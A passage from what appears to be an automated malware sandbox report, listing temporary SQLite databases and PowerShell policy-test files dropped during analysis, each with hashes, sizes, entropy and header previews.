Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XHZm90MClc

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XKPVUYFcy7

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\XSxd2wM0k4

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Yf0uZIVP1h

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YtnxI8eswZ

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Z5gIYpTGhs

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Z6bfFfN4nu

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZaT8ByDEyf

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Zc9AoTGS4I

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZwNFIZT3HA

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05ycp2n5.rqg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_205xdwvr.taq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arzm4ooi.21l.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfi5dwaz.gl2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cijha0kx.mmy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edcbj1w1.1sy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmfnaiyu.b5q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4ujzb4i.yxw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hu444ybw.i5f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia3lhvh4.mqf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idad15rv.png.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4thqieb.qtr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj1d1odw.isb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgubltnd.5pu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhw5lxbt.a1h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ofvnwnkb.0f1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql4psgso.unb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry5injj0.4kv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skq3r2dh.lr4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suunzopm.snv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vfeggks5.nd3.ps1

Download File

